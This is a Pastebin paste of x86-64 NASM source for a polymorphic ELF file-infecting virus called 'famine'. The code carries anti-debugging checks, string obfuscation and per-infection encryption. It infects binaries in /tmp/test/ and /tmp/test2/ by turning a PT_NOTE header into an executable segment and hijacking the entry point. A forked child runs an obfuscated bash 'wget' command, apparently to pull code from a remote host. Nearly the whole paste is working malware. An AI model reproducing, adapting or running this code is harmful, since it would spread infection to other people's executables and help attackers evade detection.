FlyFar

vx.s

Jun 29th, 2023
202
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
ASM (NASM) 16.60 KB | Cybersecurity | 0 0
  1. %include "./header.s"
  2.  
  3. SECTION .TEXT EXEC WRITE
  4. global  _start                              ;must be declared for linker (ld)
  5.  
  6. _start:   ;Entry-Point
  7. OBF_GENERIC
  8. PUSH
  9. OBF_GENERIC
  10.  
  11. mov rbp, rsp
  12. sub rbp, famine_size  ; reserve famine_size bytes on the stack
  13.  
  14.  
  15. OBF_POLY_1
  16.  
  17.  
  18. OBF_GENERIC
  19. .check_status:      ;open the /proc/self/status
  20. OBF_GENERIC
  21. xor rdi ,rdi
  22. lea rdi, STACK(famine.file_path)
  23.  
  24.  
  25. ;BUILD STRING /proc/self/status FOR OBF
  26. OBF_GENERIC
  27. mov rsi, 0x1E40AEC66F2F
  28. OBF_GENERIC1
  29. mov rax, 0x1122C0AC0100
  30. add rsi, rax
  31. mov qword[rdi], rsi
  32. add rdi, 6
  33. mov rsi, 0x500A87BF3341
  34. OBF_GENERIC1
  35. mov rax, 0x2324DEAD3232
  36. add rsi, rax
  37. mov qword[rdi], rsi
  38. add rdi, 6
  39. mov rsi, 0x72729481A8
  40. OBF_GENERIC
  41. mov rax, 0x0102DFDFCC
  42. add rsi, rax
  43. mov qword[rdi], rsi
  44. sub rdi, 12
  45.  
  46. OBF_GENERIC
  47.  
  48.  
  49. mov rsi, O_RDONLY
  50. OBF_GENERIC
  51. mov rax, _open
  52. syscall
  53. cmp rax, 0
  54. OBF_GENERIC
  55. jl _exx
  56.  
  57. OBF_GENERIC2
  58. lea rsi, STACK(famine.status_str)  ; buf address for read /proc/self/status
  59. mov rdi, rax   ; fd from previous read
  60. mov rdx, 110
  61. mov rax, _read
  62. OBF_GENERIC
  63. syscall
  64. cmp rax, 0
  65. jb _exx_pop
  66.  
  67. lea r12, STACK(famine.status_str)
  68. mov r11, 7
  69. OBF_GENERIC
  70. .loop_status:
  71. OBF_GENERIC2
  72. inc r12
  73. cmp byte[r12], 0x0a
  74. jne .nope
  75. OBF_GENERIC
  76. dec r11
  77. cmp r11, 0
  78. je .check_trcr
  79. .nope:
  80. OBF_GENERIC1
  81. loop .loop_status
  82.  
  83. .check_trcr:
  84. add r12, 12
  85. OBF_GENERIC2
  86. cmp byte[r12], 0x30     ;   CMP TRACERPID VAL WITH 0
  87. jne _exx_pop
  88.  
  89.  
  90.  
  91. .opendir_proc:
  92.     OBF_GENERIC
  93.     lea rdi, STACK(famine.commpath)
  94.     mov rsi, 0x13203C936162
  95.     OBF_GENERIC2
  96.     lea rdi, STACK(famine.commpath)
  97.     mov rax, 0x1C4332DF0ECD
  98.     add rsi, rax
  99.     mov qword[rdi], rsi
  100.     mov rsi, O_RDONLY | O_DIRECTORY
  101.     mov rax, _open
  102.     syscall
  103.     OBF_GENERIC1
  104.     test eax, eax
  105.     jl _exx_pop
  106.     mov r14, rax
  107.  
  108. .readdir_proc:
  109.     OBF_GENERIC
  110.     mov rdx, DIRENT_ARR_SIZE
  111.     lea rsi, STACK(famine.dirents_proc)
  112.     mov rdi, r14
  113.     mov rax, _getdents
  114.     syscall
  115.     test rax, rax
  116.     OBF_GENERIC
  117.     jle .closedir_proc
  118.     OBF_GENERIC2
  119.     mov r13, 0
  120.     mov r12, rax
  121.     call .read_file
  122.     jmp .readdir_proc
  123.  
  124. .closedir_proc:
  125.     mov rdi, r14
  126.     OBF_GENERIC2
  127.     mov rax, _close
  128.     syscall
  129.     jmp .OUI
  130.  
  131.  
  132. .read_file:
  133.     lea rdi, STACK(famine.dirents_proc)
  134.     add rdi, r13
  135.     OBF_GENERIC2
  136.     movzx edx, word[rdi+dirent.d_reclen]
  137.     mov al, byte[rdi + rdx - 1]
  138.     add rdi, dirent.d_name
  139.     OBF_GENERIC2
  140.     add r13, rdx
  141.     cmp al, DT_DIR
  142.     jne .nextfile_proc
  143.  
  144.  
  145.  
  146. ;compute commfile path
  147. xor r10, r10
  148.  
  149. .dirname_proc:
  150.     lea rsi, STACK(famine.commpath)
  151.     mov rax, 0x13203C936162
  152.     OBF_GENERIC2
  153.     mov r11, 0x1C4332DF0ECD
  154.     add rax, r11
  155.     mov qword[rsi], rax
  156.     add r10, 6
  157.     jb .dirname_proc
  158.  
  159. .filename_proc:
  160.     mov al, byte[rdi]
  161.     mov byte[rsi + r10], al
  162.     inc r10
  163.     OBF_GENERIC2
  164.     inc rdi
  165.     cmp byte[rdi], 0
  166.     jne .filename_proc
  167.  
  168.  
  169. .commfile:
  170.     mov rax, 0x5CAEC3C0FF
  171.     OBF_GENERIC
  172.     mov r11, 0x10BEABA230
  173.     add rax, r11
  174.     mov qword[rsi + r10], rax
  175.     add r10, 6
  176.     OBF_GENERIC2
  177.     mov byte[rsi + r10], 0
  178.  
  179. ;open the commfile
  180.     xor rsi, rsi
  181.     mov rax, _open
  182.     lea rdi, STACK(famine.commpath)
  183.     OBF_GENERIC1
  184.     mov rdx, O_RDWR
  185.     syscall
  186.     test eax, eax
  187.     jl .nextfile_proc
  188.  
  189. ;read the commfile
  190.     OBF_PUSH_RAX
  191.     mov rdi, rax
  192.     mov rax, _read
  193.     OBF_GENERIC2
  194.     lea rsi, STACK(famine.commpath)
  195.     mov rdx, 90
  196.     syscall
  197.     OBF_POP_R9
  198.     test eax, eax
  199.     jl .close_proc
  200.     mov byte[rsi + rax - 1], 0x0
  201.     lea rdi, [rel forbidden]
  202.     call .strcmp
  203.     cmp rax, 0
  204.     je .done
  205.     .close_proc:
  206.     OBF_GENERIC2
  207.     mov rdi, r9
  208.     mov rax, _close
  209.     syscall
  210.     jmp .nextfile_proc
  211.  
  212.  
  213. .strcmp:
  214.     mov r10b, BYTE [rdi]
  215.     OBF_GENERIC2
  216.     mov r11b, BYTE [rsi]
  217.     cmp r10b, 0
  218.     je .end_cmp
  219.     cmp r11b, 0
  220.     je .end_cmp
  221.     cmp r10b, r11b
  222.     jne .end_cmp
  223.     inc rdi
  224.     OBF_GENERIC1
  225.     inc rsi
  226.     jmp .strcmp
  227.  
  228. .end_cmp:
  229.     movzx rax, r10b
  230.     movzx rbx, r11b
  231.     OBF_GENERIC
  232.     sub rax, rbx
  233.     ret
  234.  
  235. .done:
  236.     OBF_POP_RDI     ; this pop is required in case of Exit from strcmp cause we did a CALL in readdir_proc  and must pop its address
  237.     jmp _exx_pop
  238.  
  239. .nextfile_proc:
  240.     cmp r13, r12
  241.     jl .read_file
  242.     ret
  243.  
  244.  
  245. .get_random:
  246.     OBF_PUSH_RDI
  247.     push rsi
  248.     OBF_PUSH_RAX
  249.     push rdx
  250.  
  251.     OBF_GENERIC2
  252.     lea rdi, [rel random]
  253.     mov rsi, O_RDONLY
  254.     mov rax, _open
  255.     OBF_GENERIC
  256.     syscall                 ; OPEN /dev/urandom  EXIT if not work
  257.     cmp rax, 0
  258.     jl  .err_ex
  259.  
  260.     mov rdi, rax        ; fd to read
  261.     OBF_GENERIC2
  262.     mov rax, _read
  263.     mov rdx, 4
  264.     lea rsi, STACK(famine.tmp_rand)
  265.     OBF_GENERIC
  266.     syscall             ; READ 8 RANDOM BYTE<3
  267.    
  268.     mov rax, _close
  269.     syscall
  270.  
  271.     OBF_GENERIC
  272.     pop rdx
  273.     OBF_POP_RAX
  274.     pop rsi
  275.     OBF_POP_RDI
  276.     ret
  277.     .err_ex:
  278.     pop rdx
  279.     OBF_POP_RAX
  280.     pop rsi
  281.     OBF_POP_RDI
  282.     OBF_POP_RDI
  283.     OBF_POP_RDI
  284.     jmp _exx_pop
  285.  
  286. .OUI:
  287. jmp .enc_start
  288.     OBF_GENERIC
  289. DECYPHER
  290.     OBF_GENERIC
  291.  
  292.  
  293.  
  294. .enc_start:
  295.  
  296. ;DUREX BLOCK HERE  BETWEEN .DUREX AND .SKIP_DUREX
  297. .durex:
  298. ;FORK THE DUREX PROCESS !
  299.     OBF_GENERIC
  300.     mov rax, _fork
  301.     OBF_GENERIC
  302.     syscall
  303.     cmp rax, 0
  304.     jne .skip_durex
  305.  
  306.  
  307. ;   CLOSE FD 1 AND 2 FOR FORKED  DUREX PROCESS
  308.     OBF_GENERIC
  309.     mov rax, _close
  310.     mov rdi, 1
  311.     syscall
  312.     mov rax, _close
  313.     OBF_GENERIC
  314.     mov rdi, 2
  315.     syscall
  316.  
  317.     lea rdi, STACK(famine.status_str)
  318.     OBF_GENERIC
  319.     lea rsi, STACK(famine.commpath)
  320.     mov rax, 0x69622f
  321.     mov qword[rdi], rax
  322.     OBF_GENERIC
  323.     add rdi, 3
  324.     mov rax, 0x687361622f6e
  325.     mov qword[rdi], rax
  326.     OBF_GENERIC
  327.     sub rdi, 3
  328.     mov qword[rsi], rdi
  329.  
  330.     mov dword STACK(famine.new_dir), 0x0000632d
  331.     OBF_GENERIC
  332.     lea rax, STACK(famine.new_dir)
  333.  
  334.     mov qword[rsi+8], rax
  335.     add rax, 4
  336.  
  337.     mov byte[rax], 0x27
  338.     inc rax
  339.     mov r10, 0x74656777
  340.     OBF_GENERIC
  341.     mov qword[rax], r10
  342.     mov qword[rsi+16], rax
  343.     OBF_GENERIC
  344.     add rax, 4
  345.     mov r10b, 0x20
  346.     mov byte[rax], r10b
  347.     OBF_GENERIC
  348.     inc rax
  349.  
  350.     mov r10, 0x1FE9D6214E305123
  351.     OBF_GENERIC
  352.     mov r11, 0xF45645222442345
  353.     add r10, r11
  354.     mov qword[rax], r10
  355.     mov r10, 0x627F71E4CF734788
  356.     mov r11, 0xAEF090990121DF
  357.     add r10, r11
  358.     mov qword[rax+8], r10
  359.     mov r10, 0x1338087384BA29D6
  360.     OBF_GENERIC
  361.     mov r11, 0x623758FEDC754399
  362.     add r10, r11
  363.     mov qword[rax+16], r10
  364.     mov r10, 0x657480C882200252
  365.     mov r11, 0xFEFE4A9AD123222
  366.     add r10, r11
  367.     mov qword[rax+24], r10
  368.     mov r10, 0x58F9FA9117B35E00
  369.     mov r11, 0x143567DE54AED178
  370.     add r10, r11
  371.     mov qword[rax+32], r10
  372.     mov r10, 0x651A41E5BDEFB23E
  373.     mov r11, 0x1029ED8CA784C123
  374.     OBF_GENERIC
  375.     add r10, r11
  376.     mov qword[rax+40], r10
  377.     OBF_GENERIC
  378.     mov r10, 0x1BAAB6F9EB6664A5
  379.     mov r11, 0x21CCAA78541200CD
  380.     add r10, r11
  381.     mov qword[rax+48], r10
  382.     mov r10, 0x24167B8C5FA63D78
  383.     mov r11, 0x0909E9E912CDFFFF
  384.     add r10, r11
  385.     mov qword[rax+54], r10
  386.     mov r10, 0x5F5C631E0F3E
  387.     mov r11, 0x742F111111111111
  388.     add r10, r11
  389.     OBF_GENERIC
  390.     mov qword[rax+62], r10
  391.     mov r10, 0x20527BA8C39CA60E
  392.     mov r11, 0x5412EDCCAD908712
  393.     add r10, r11
  394.     mov qword[rax+70], r10
  395.     mov r10, 0x425B84450C07D917
  396.     mov r11, 0x3409DFEA14675409
  397.     add r10, r11
  398.     mov qword[rax+78], r10
  399.     mov r10, 0xEBAA7DC5A415D1E
  400.     mov r11, 0x1165789012341111
  401.     add r10, r11
  402.     OBF_GENERIC
  403.     mov qword[rax+86], r10
  404.     mov r10, 0x1A0A262C437B24DB
  405.     mov r11, 0x55634236DCAB0145
  406.     add r10, r11
  407.     mov qword[rax+94], r10
  408.     mov r10, 0x73FCDA4A89A6B921
  409.     mov r11, 0x3245ECAD906743
  410.     add r10, r11
  411.     mov qword[rax+102], r10,
  412.     mov r10, 0xEE0591FED833C10
  413.     OBF_GENERIC
  414.     mov r11, 0x1145CD0086AC345D
  415.     add r10, r11
  416.     mov qword[rax+110], r10
  417.     mov r10, 0x1CB03BEFFFD03BF
  418.     mov r11, 0x7070707070707070
  419.     add r10, r11
  420.     mov qword[rax+118], r10
  421.     mov r10, 0x55522D191E1C52C0
  422.     OBF_GENERIC
  423.     mov r11, 0x1EDD43545612CDAD
  424.     add r10, r11
  425.     mov qword[rax+126], r10
  426.     mov qword[rsi+24], 0x0
  427.     OBF_GENERIC
  428.     mov rdx, 0
  429.     mov rax, 59
  430.     syscall
  431.     .skip_durex:
  432.  
  433.     OBF_GENERIC1
  434.     mov rax, _fork
  435.     syscall
  436.     OBF_GENERIC
  437.     cmp rax, 0
  438.     jne _exx_pop
  439.  
  440. lea rdi, [rel infect_dir] ; load dir str
  441. .opendir:
  442.     mov r14, rdi
  443.     OBF_GENERIC1
  444.     OBF_GENERIC
  445.     mov rsi, O_RDONLY | O_DIRECTORY
  446.     mov rax, _open
  447.     syscall             ;   open directory
  448.     test eax, eax
  449.     jl .nextdir
  450.     mov STACK(famine.dir_fd), rax       ; save dir_fd
  451.  
  452. .readdir:
  453.     mov rdx, DIRENT_ARR_SIZE
  454.     lea rsi, STACK(famine.dirents)
  455.     mov rdi, STACK(famine.dir_fd)
  456.     mov rax, _getdents
  457.     syscall             ;   get directory entries
  458.     test  rax,rax
  459.     jle .closedir       ;   no more entries
  460.     mov r13, 0
  461.     mov r12, rax
  462.  
  463. .file:
  464.     ; check directory entry for a regular file
  465.     lea rdi, STACK(famine.dirents)
  466.     add rdi, r13
  467.     movzx edx, word[rdi + dirent.d_reclen]
  468.     mov al, byte[rdi + rdx - 1]
  469.     add rdi, dirent.d_name
  470.     OBF_GENERIC1
  471.     add r13, rdx
  472.     cmp al, DT_REG
  473.     jne .nextfile
  474.     call process        ; process the file
  475.  
  476. .nextfile:
  477.     cmp r13, r12        ; check if directory entry looping is over
  478.     jl .file
  479.     jmp .readdir        ; read dir for more entry
  480.  
  481. .closedir:
  482.     mov rdi, STACK(famine.dir_fd)
  483.     mov rax, _close
  484.     syscall
  485.  
  486. .nextdir:
  487.     mov ecx, 0
  488.     mul ecx
  489.     dec ecx
  490.     mov rdi, r14
  491.     repnz scasb     ; next infect_dir
  492.     cmp byte[rdi], 0
  493.     jnz .opendir
  494.     POP     ; restore register
  495.     jmp _exx.exit       ;jump to the end
  496.  
  497. process:
  498.     mov rsi, r14  ; r14 hold infect dir
  499.     mov rax, rdi
  500.     lea rdi, STACK(famine.file_path)  ; load stack addr to store file_path
  501.     mov rdx, rdi
  502.  
  503. .dirname:
  504.     movsb           ; load dirname to rdi
  505.     cmp byte [rsi], 0
  506.     jnz .dirname
  507.     mov rsi, rax
  508.  
  509.     OBF_GENERIC
  510. .filename:
  511.     movsb           ; append filename to dirname to get full path
  512.     cmp byte[rsi - 1], 0
  513.     jnz .filename
  514.     mov rdi, rdx
  515.                 ;open file
  516.     mov rsi, O_RDWR
  517.     mov rax, _open
  518.     syscall         ; open
  519.  
  520.  
  521.     test eax, eax
  522.     jl .return
  523.     mov STACK(famine.file_fd), rax      ; save result from open to stack
  524.     OBF_GENERIC1
  525.  
  526.                 ;stat
  527.     lea rsi, STACK(famine.stat)
  528.     mov rdi, rax
  529.     mov rax, _fstat
  530.     syscall
  531.     cmp rax, 0
  532.     jnz .close
  533.     mov rsi, qword STACK(famine.stat + stat.st_size)    ; file size from stat to rsi
  534.     mov STACK(famine.file_size), rsi    ; save file size to stack
  535.     cmp rsi, elf64_ehdr_size + elf64_phdr_size + FAMINE_SIZE  ; check if size < ehdr_size + phdr size + famine_size
  536.     jl .close
  537.                 ;MMAP file
  538.     mov r9, 0
  539.     mov r8, STACK(famine.file_fd)  ; restore file_fd
  540.     mov r10, MAP_SHARED
  541.     mov rdx, PROT_READ | PROT_WRITE
  542.     xor rdi, rdi
  543.     mov rax, _mmap
  544.     syscall
  545.  
  546.     cmp rax, MMAP_ERRORS
  547.     jae .close
  548.    
  549.     mov STACK(famine.file_data), rax    ; save mmap to file from rax to stack
  550.     mov rdi, rax                        ;
  551.     call check_elf64
  552.     test al,al
  553.     jz .unmap
  554.     call inject_self
  555.  
  556. .unmap:
  557.     mov rsi, STACK(famine.file_size)
  558.     mov rdi, STACK(famine.file_data)
  559.     OBF_GENERIC1
  560.     mov rax, _munmap
  561.     syscall
  562.  
  563. .close:
  564.     mov rdi, STACK(famine.file_fd)
  565.     mov rax, _close
  566.     syscall
  567.  
  568. .return:
  569.     ret
  570.  
  571. check_elf64:
  572.     xor rax, rax
  573.     cmp qword[rdi+8], rax
  574.     jnz .return
  575.     mov rdx, _SYSV_         ;elf SYSV
  576.     cmp qword [rdi], rdx
  577.     jz .continue
  578.     mov rdx, _GNU_          ;ELF_GNU
  579.     cmp qword[rdi], rdx
  580.     jnz .return
  581.  
  582. .continue:
  583.     mov rdx, _DYN_
  584.     cmp qword[rdi + 16], rdx  ; DYN
  585.     jz .ok
  586.     mov rdx, _EXEC_
  587.     cmp qword[rdi + 16], rdx    ; EXEC
  588.     jnz .return
  589. .ok:
  590.     inc rax
  591. .return:
  592.     ret
  593.  
  594. inject_self:
  595.     push r13        ; save registers in case we need to restore
  596.     OBF_OVERWRITE_PUSHR14R15
  597.  
  598.     OBF_GENERIC2
  599.     jmp .after_poly_crap_skipped
  600.     POLY_CRAP_SKIPPED
  601.     .after_poly_crap_skipped:
  602.  
  603.  
  604.     mov r15, rdi ; save phdr[0] offset to r15
  605.     mov rdx, qword [rdi + elf64_ehdr.e_entry]
  606.     movzx rcx, word [rdi + elf64_ehdr.e_phnum]
  607.     mov rax, qword[rdi + elf64_ehdr.e_phoff]
  608.     add rdi,rax
  609.     mov r14, rdi  ; save phdr[0] offset to r14
  610.  
  611.     .segment:
  612.     cmp rcx, 0
  613.     jl .return
  614.     mov ax, SEGMENT_TYPE
  615.     mov r11w, word [rdi]
  616.     cmp ax, r11w
  617.     jnz .next
  618.     jmp .infect
  619.  
  620.     .next:
  621.     add rdi, elf64_phdr_size  ; add phdr size to rdi to loop through pheaders
  622.     dec rcx                   ; decrement phnum
  623.     jmp .segment
  624.  
  625.     .infect:
  626.     OBF_PUSH_RDI ; save phdr to infect offset to  stack
  627.  
  628. .get_rand_key:
  629.     OBF_GENERIC1
  630.     lea rdi, [rel random]
  631.     mov rsi, O_RDONLY
  632.     mov rax, _open
  633.     OBF_GENERIC
  634.     syscall                 ; OPEN /dev/urandom  EXIT if not work
  635.     cmp rax, 0
  636.     jl  _exx_pop
  637.  
  638.     OBF_PUSH_RAX
  639.     mov rdi, rax        ; fd to read
  640.     mov rax, _read
  641.     mov rdx, 2
  642.     lea rsi, STACK(famine.key)
  643.     syscall             ; READ 2 byte, 1 for key, 1 for derivate
  644.    
  645.     OBF_POP_RAX
  646.     mov rdi, rax        ; fd to read
  647.     mov rax, _read
  648.     mov rdx, 1
  649.     lea rsi, STACK(famine.factor)
  650.     OBF_GENERIC2
  651.     syscall             ; READ 2 byte, 1 for key, 1 for derivate
  652.     mov rax, _close
  653.     OBF_GENERIC1
  654.     syscall
  655.  
  656. OBF_GENERIC1
  657. ; get target End of file
  658.     mov rdi, STACK(famine.file_fd) ; target fd to rdi
  659.     mov rsi, 0 ; offset 0
  660.     mov rdx, END_SEEK
  661.     mov rax, _lseek
  662. OBF_GENERIC1
  663.     syscall
  664.     OBF_PUSH_RAX; save eof from lseek to stack
  665.  
  666. ;Here we check a presence of signature in case of a double PT_NOTE crap
  667.     mov r13, STACK(famine.file_data)
  668.     add r13, rax
  669.     sub r13, BEGIN_SIGNATURE_OFFSET_FORM_END
  670.     cmp byte[r13], 'P'
  671.     je .return_pop
  672.  
  673.     ; get delta  ( address at execution time)
  674.     call .delta
  675.     .delta:
  676.     pop r13
  677.     sub r13, .delta
  678.    
  679.     ; load cypher and write v
  680.     lea rsi, [r13 + _start] ; load _start addr to rsi
  681.     mov rdx, _end - _start  ; virus size to rdx
  682.     lea r10, STACK(famine.tocypher)  ; r10 hold future v-location in stack
  683.     .loading_v:
  684.         mov r11b, byte[rsi]
  685.         mov [r10], r11b
  686.     OBF_GENERIC1
  687.         inc rsi
  688.         inc r10
  689.         dec rdx
  690.     OBF_GENERIC
  691.         cmp rdx, 0
  692.         jg .loading_v
  693.  
  694.  
  695.     lea r10, STACK(famine.tocypher)
  696.     add r10,JUMP_DECYPHER_OFFSET
  697.     mov byte[r10], 0
  698.    
  699.     lea r10, STACK(famine.tocypher)
  700.     add r10, KEY_OFFSET
  701.     mov r11b, STACK(famine.key)
  702.     OBF_GENERIC1
  703.     mov byte[r10], r11b
  704.  
  705.     lea r10, STACK(famine.tocypher)
  706.     add r10, FACTOR_OFFSET
  707.     mov r11b, STACK(famine.factor)
  708.     mov byte[r10], r11b
  709.  
  710.     push r12
  711.     xor r12, r12
  712.    
  713.     lea r10, STACK(famine.tocypher)
  714.     add r10, SIGNATURE_OFFSET
  715.     mov r11b, STACK(famine.morph_sign_u)
  716.     mov r12b, STACK(famine.morph_sign_d)
  717.     cmp r11b, 7
  718.     jl .fp
  719.     inc r12b
  720.     mov r11, 0
  721.     .fp:
  722.     inc r11b
  723.     OBF_GENERIC2
  724.     add byte[r10], r12b
  725.     inc r10
  726.     add byte[r10], r11b
  727.     inc r10
  728.     add byte[r10], r12b
  729.     OBF_GENERIC1
  730.     inc r10
  731.     add byte[r10], r11b
  732.     inc r10
  733.     add byte[r10], r12b
  734.     inc r10
  735.     add byte[r10], r11b
  736.     inc r10
  737.     OBF_GENERIC
  738.     add byte[r10], r12b
  739.     inc r10
  740.     add byte[r10], r11b
  741.     .done_finger:
  742.     mov STACK(famine.morph_sign_u), r11
  743.     mov STACK(famine.morph_sign_d), r12
  744.     OBF_GENERIC2
  745.     call _start.get_random
  746.     lea r10,STACK(famine.tocypher)
  747.     add r10, POLY_OFFSET_1
  748.     mov r12, STACK(famine.tmp_rand)
  749.     mov dword[r10], r12d
  750.  
  751.     OBF_GENERIC1
  752.     call _start.get_random
  753.     lea r10, STACK(famine.tocypher)
  754.     add r10, POLY_CRAP_SKIPPED_OFFSET
  755.     mov rsi, 7
  756.  
  757.     .patch_poly_crap:
  758.     call _start.get_random
  759.     mov r12, STACK(famine.tmp_rand)
  760.     mov dword[r10], r12d
  761.     add r10, 4
  762.     dec rsi
  763.     cmp rsi, 0
  764.     jne .patch_poly_crap
  765.  
  766. CYPHER
  767.     pop r12
  768.  
  769.     mov rdi, STACK(famine.file_fd) ; fd to rdi
  770.     lea rsi, STACK(famine.tocypher)
  771.     mov rdx, _end - _start  ; virus size to rdx
  772.     OBF_POP_R10 ; rax hold eof from lseek syscall
  773.     OBF_PUSH_R10
  774.     mov rax, _pwrite
  775.     syscall
  776.     cmp rax, 0
  777.     jbe .return
  778.  
  779.     .edit_phdr:
  780.     OBF_POP_RAX             ;RDI = the offset of patched PHEADER
  781.     OBF_GENERIC
  782.     OBF_POP_RDI
  783.     OBF_PUSH_RDI
  784.     OBF_PUSH_RAX
  785.     mov dword [rdi], 1
  786.     mov eax, PF_R   ; READ
  787.     or eax, PF_X    ; EXEC
  788.     or eax, PF_W    ; WRITE
  789.     mov dword [rdi + 4], eax   ;SET PERMS !
  790.     OBF_POP_RAX             ; RAX = The offset of our injected V , (old EOF)
  791.     mov [rdi + 8], rax  ; set phdr.offset  = rax
  792.     mov r13, qword STACK(famine.stat + stat.st_size) ; load target size to r13
  793.     OBF_GENERIC1
  794.     add r13, 0xc000000 ; add vsize to r13
  795.     mov [rdi + 16], r13 ; edit  p_vaddr
  796.     mov [rdi + 24], r14 ; change paddr to new size
  797.     mov qword [rdi + 48], 0x200000  ; set align to 2mb
  798.     add qword [rdi + 32], _end - _start + 5
  799.     add qword [rdi + 40], _end - _start + 5
  800.  
  801.     .edit_ehdr:
  802.     mov rdi, STACK(famine.file_data)
  803.     mov r14, [rdi + elf64_ehdr.e_entry ] ; save original e_entry to r14
  804.     mov [rdi + elf64_ehdr.e_entry], r13 ; set ehdr.e_entry to vaddr of injected
  805.    
  806.     ;write it
  807.     mov rdi, STACK(famine.file_fd)
  808.     mov rsi, r15
  809.     mov rdx, EHDR_SIZE              ; 64 is size of EHDR
  810.     mov r10, 0
  811.     OBF_GENERIC
  812.     mov rax, _pwrite
  813.     syscall
  814.  
  815.     .jmp_wuw:
  816.     mov rdi , STACK(famine.file_fd)
  817.     OBF_GENERIC
  818.     mov rsi, 0
  819.     mov rdx, END_SEEK
  820.     OBF_GENERIC
  821.     mov rax, _lseek
  822.     OBF_GENERIC
  823.     syscall                     ; seek to file_end
  824.    
  825. ;   compute jump value
  826.     OBF_POP_RDI ;   restore patched pheader
  827.     mov rdx, [rdi + elf64_phdr.p_vaddr]
  828.     sub rdx, RETURN_JUMP_VALUE_OFFSET
  829.     sub r14, rdx
  830.     sub r14, _end - _start
  831.     OBF_GENERIC1
  832.     mov byte STACK(famine.jmp), JMP; jmp opcode
  833.     mov dword STACK(famine.jmp + 1), r14d
  834.  
  835. ;write it
  836.     mov rdi, STACK(famine.file_fd)
  837.     lea rsi, STACK(famine.jmp)
  838.     mov rdx, 5
  839.     OBF_GENERIC
  840.     sub rax, RETURN_JUMP_OFFSET  ; offset between _end:  and jump .exit
  841.     mov r10, rax ; EOF From last call to lseek
  842.     mov rax, _pwrite
  843.     OBF_GENERIC1
  844.     syscall
  845.  
  846.     mov rax, _sync
  847.     syscall
  848.    
  849.     jmp .return
  850.     .return_pop:
  851.     OBF_POP_RAX
  852.     OBF_POP_RDI
  853.     .return :
  854.         pop r15     ; restore saved registers
  855.     OBF_GENERIC1
  856.         pop r14
  857.         pop r13
  858.         ret
  859.  
  860.  
  861. infect_dir      db          "/tmp/test/",0,"/tmp/test2/",0,0
  862. enc_end:
  863.     db 0
  864. signature       db          0x00, 'Primary   version 99.0 (c)oded by <yarilo>42424242', 0xa, 0x00
  865. forbidden       db          "test.out", 0
  866. famine_entry    dq          _start
  867. random          db          "/dev/urandom",0,0
  868.  
  869. _exx_pop:
  870. POP
  871. _exx:
  872. jmp .exit   ; at source execution of famine this will exit. when written to target jump is edited to host entry
  873.         db 00, 00, 00, 00, 00
  874.     .exit:
  875.         mov rax, _exit
  876.         mov rdi, 0
  877.         syscall
  878. _end:
Add Comment
Please, Sign In to add comment